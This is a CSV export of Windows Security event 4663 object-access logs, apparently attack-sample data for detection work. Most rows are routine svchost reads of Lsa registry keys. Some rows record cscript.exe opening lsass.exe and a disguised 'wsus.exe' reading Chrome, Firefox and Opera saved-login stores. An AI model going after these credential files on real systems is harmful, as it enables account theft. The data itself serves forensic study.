+2019-03-20T03:35:15.365477+04:00,1553038515.365477,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452921 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.365477+04:00,1553038515.365477,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452920 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.365477+04:00,1553038515.365477,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452919 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.365477+04:00,1553038515.365477,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452918 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452917 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452916 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452915 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452914 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452913 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452912 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452911 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452910 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452909 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452908 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452907 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452906 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2020-03-09T02:11:34.340693+04:00,1583705494.340693,4663,IEUser,\Device\HarddiskVolume1\Windows\System32\lsass.exe,Process,C:\Windows\System32\cscript.exe,MSEDGEWIN10,Security," + + + + + 4663 + 1 + 0 + 12802 + 0 + 0x8020000000000000 + + + 314462 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x33392 + Security + Process + \Device\HarddiskVolume1\Windows\System32\lsass.exe + 0x558 + %%4484 + + 0x10 + 0x1688 + C:\Windows\System32\cscript.exe + - + +" +1601-01-01T04:00:00+04:00,-11644473600.0,4663,IEUser,C:\Users\IEUser\AppData\Local\Google\Chrome\User Data\Default\Login Data,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security," + + + + + 4663 + 0 + 0 + 12800 + 0 + 0x8020000000000000 + + + 4991 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0xffa8 + Security + File + C:\Users\IEUser\AppData\Local\Google\Chrome\User Data\Default\Login Data + 0x50 + %%4416 + + 0x1 + 0x134c + C:\Users\Defau1t\wsus.exe + +" +2019-04-27T23:33:50.134293+04:00,1556393630.134293,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\logins.json,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security," + + + + + 4663 + 0 + 0 + 12800 + 0 + 0x8020000000000000 + + + 4990 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0xffa8 + Security + File + C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\logins.json + 0x50 + %%4416 + + 0x1 + 0x134c + C:\Users\Defau1t\wsus.exe + +" +2019-04-27T23:33:18.699755+04:00,1556393598.699755,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\key4.db,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security," + + + + + 4663 + 0 + 0 + 12800 + 0 + 0x8020000000000000 + + + 4989 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0xffa8 + Security + File + C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\key4.db + 0x50 + %%4416 + + 0x1 + 0x134c + C:\Users\Defau1t\wsus.exe + +" +2019-04-27T23:33:05.308188+04:00,1556393585.308188,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Opera Software\Opera Stable\Login Data,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security," + + + + + 4663 + 0 + 0 + 12800 + 0 + 0x8020000000000000 + + + 4988 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0xffa8 + Security + File + C:\Users\IEUser\AppData\Roaming\Opera Software\Opera Stable\Login Data + 0x50 + %%4416 + + 0x1 + 0x134c + C:\Users\Defau1t\wsus.exe + +" +2020-03-09T02:11:34.340693+04:00,1583705494.340693,4663,IEUser,\Device\HarddiskVolume1\Windows\System32\lsass.exe,Process,C:\Windows\System32\cscript.exe,MSEDGEWIN10,Security," + + + + + 4663 + 1 + 0 + 12802 + 0 + 0x8020000000000000 + + + 314462 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x33392 + Security + Process + \Device\HarddiskVolume1\Windows\System32\lsass.exe + 0x558 + %%4484 + + 0x10 + 0x1688 + C:\Windows\System32\cscript.exe + - + +" +1601-01-01T04:00:00+04:00,-11644473600.0,4663,IEUser,C:\Users\IEUser\AppData\Local\Google\Chrome\User Data\Default\Login Data,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security," + + + + + 4663 + 0 + 0 + 12800 + 0 + 0x8020000000000000 + + + 4991 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0xffa8 + Security + File + C:\Users\IEUser\AppData\Local\Google\Chrome\User Data\Default\Login Data + 0x50 + %%4416 + + 0x1 + 0x134c + C:\Users\Defau1t\wsus.exe + +" +2019-04-27T23:33:50.134293+04:00,1556393630.134293,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\logins.json,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security," + + + + + 4663 + 0 + 0 + 12800 + 0 + 0x8020000000000000 + + + 4990 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0xffa8 + Security + File + C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\logins.json + 0x50 + %%4416 + + 0x1 + 0x134c + C:\Users\Defau1t\wsus.exe + +" +2019-04-27T23:33:18.699755+04:00,1556393598.699755,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\key4.db,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security," + + + + + 4663 + 0 + 0 + 12800 + 0 + 0x8020000000000000 + + + 4989 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0xffa8 + Security + File + C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\key4.db + 0x50 + %%4416 + + 0x1 + 0x134c + C:\Users\Defau1t\wsus.exe + +" +2019-04-27T23:33:05.308188+04:00,1556393585.308188,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Opera Software\Opera Stable\Login Data,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security," + + + + + 4663 + 0 + 0 + 12800 + 0 + 0x8020000000000000 + + + 4988 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0xffa8 + Security + File + C:\Users\IEUser\AppData\Roaming\Opera Software\Opera Stable\Login Data + 0x50 + %%4416 + + 0x1 + 0x134c + C:\Users\Defau1t\wsus.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452905 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452904 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452903 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452902 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452901 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452900 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452899 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452898 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452897 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452896 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452895 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452894 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452893 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452892 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452891 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452890 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452889 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452888 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452887 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452886 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452885 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 